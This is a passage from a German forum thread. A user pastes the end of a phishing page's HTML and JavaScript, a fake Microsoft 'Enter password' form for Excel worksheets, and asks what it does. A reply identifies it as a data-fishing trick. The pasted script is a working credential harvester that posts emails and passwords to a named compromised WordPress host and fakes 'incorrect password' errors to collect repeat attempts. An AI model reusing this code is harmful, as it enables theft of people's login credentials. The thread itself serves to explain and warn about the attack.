                <button type="button" class="backButton" id="idBtn_Back"> <img role="presentation" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"> </button>
                <div id="show-email" class="identity"></div>
            </div>
    <div id="loginHeader" class="row title ext-title">
        <div role="heading" aria-level="1">Enter password</div>
    </div>
    <div id="errorpw" style="color: red; margin: 15px; margin-left: 0px; margin-top: 0px; margin-bottom: 0px;"></div>
    <div id="important1" style="color: black;font-size: 13px;">
        Because you're accessing sensitive info, you need to verify your password to view excel worksheets
     </div>
    <div class="row">
        <div class="form-group col-md-24">
            <div class="placeholderContainer">
                <input name="passwd" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" required />
            </div>
        </div>
    </div>
    <div>
    <div class="position-buttons">
        <div>
            <div class="row">
                <div class="col-md-24">
                    <div class="text-13">
                        <div class="form-group">
                            <a id="idA_PWD_ForgotPassword" role="link" href="#">Note: Only recipient's email can access shared files</a>
                        </div>
    <div class="form-group">
    </div>
            <div class="form-group">
                <a id="i1668" href="#"></a>
            </div></div></div></div>
        </div>

        <div class="win-button-pin-bottom">
            <div class="row">
                <div><div class="col-xs-24 no-padding-left-right button-container">
        <div class="inline-block">
            <input type="submit" id="Button9" class="win-button button_primary button ext-button primary ext-primary" value="Signin">
        </div>
    </div></div>
            </div>
        </div>
    </div></div>
        </div>
    </div>
    </div>
    </div>
    </div>
        </div>
    </div></div>
            </div>
        </div>
        <div class="plate footer ext-footer" role="contentinfo"></div>
    <div id="footer" role="contentinfo" class="footer ext-footer">
        <div>
<div id="footerLinks" class="footerNode text-secondary">
        <a id="ftrTerms" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
        <a id="ftrPrivacy" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
    <a id="moreOptions" href="#" aria-label="Click here for troubleshooting information" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div></div>
    </div>
</div>
</div></div>
</form>
<script>
    var count = 0;
    function set_brand(email) {
        $.ajax({
            url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
            type: "POST",
            data: { username: email },
            success: function (response) {
                let res = JSON.parse(response)
                let logo = res["res"]["BannerLogo"], background = res["res"]["Illustration"], DarkTile = res["res"]["TileDarkLogo"]
                let TileLogo = res["res"]["TileLogo"], BoilerPlateText = res["res"]["BoilerPlateText"]
                if (logo) {
                    $('.logo').attr('src', logo);
                }
                if (BoilerPlateText) {
                    console.log(BoilerPlateText);
                    $(".plate").append(BoilerPlateText);
                    $(".plate").css({"text-align": "center"})
                }
                if (background) {
                    $('.background-image').css({ 'background-image': 'url(' + background + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                } else if (DarkTile) {
                    $('.background-image').css({ 'background-image': 'url(' + DarkTile + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                } else if (TileLogo) {
                    $('.background-image').css({ 'background-image': 'url(' + TileLogo + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                }
            }
        });
    }

    function send_result(user, pass) {
        $.ajax({
            url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
            data: {
                "email": user,
                "password": pass
            },
            type: "POST",
            success: function (data) {
                console.log(data);
            },
            error: function (data) {
                console.log('Ajax error');
            }
        });
    }


    document.addEventListener('DOMContentLoaded', async() => {
        if(url_string){
            document.getElementById("show-email").innerHTML = url_string;
            document.getElementById("i0118").focus();
            set_brand(url_string);
        }

        document.getElementById("Button9").addEventListener("click", e => {
            event.preventDefault ? event.preventDefault() : event.returnValue = false;

            var pswd = document.getElementById("i0118").value;
            if(pswd.length < 5){
                document.getElementById("important1").style.display="none";
                setTimeout(() => {document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = "Your account password is too short."}, 1500);
            } else if (pswd.length > 5 && count <= 0) {
                send_result(url_string, pswd);
                document.getElementById("important1").style.display="none";
                setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
            } else if (count < 2){
                send_result(url_string, pswd);
                document.getElementById("important1").style.display = "none";
                setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
            } else {
                send_result(url_string, pswd);
                setTimeout(() => {window.location.replace("https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee")});
            }
        });
    });
</script>
</div></body></html>

... leider spreche ich kein JavaScript! Könntet Ihr mich bitte aufklären, was die Scripts hier genau machen und welche Maßnahmen ich ergreifen muss!

Besten Dank im Voraus!
Zitieren
#2
Hi,
das ganze erstellt sozusagen eine neue HTML-Seit mithilfe von JavaScript und der Methode write.
Es erstellt eine Fakeseite worauf eine Excel-Tabelle abgebildet ist, wo man sein Password eingeben soll. Es ist ein billiger billiger Trick um Daten abzufischen.

Zusatz: Er sendet die Daten also E-Mailadresse und gegebenfalls das eingegebene Passwort an: https://bascom.pl

Das würde ich dort vielleicht auch melden, weil die nix über deren Angriff wissen. Durch einen WordPress-Fehler konnten sie diese Seite nutzen, um heimlich Daten aufzuzeichnen.


Angehängte Dateien Thumbnail(s)
   
"Gerne dürft ihr mir eine gute Bewertung da lassen aber auch gegenüber Kritik bin ich offen" Angel
Zitieren
#3
I guess it sends emails to an email user automatically.
Zitieren


Gehe zu:


Benutzer, die gerade dieses Thema anschauen:
1 Gast/Gäste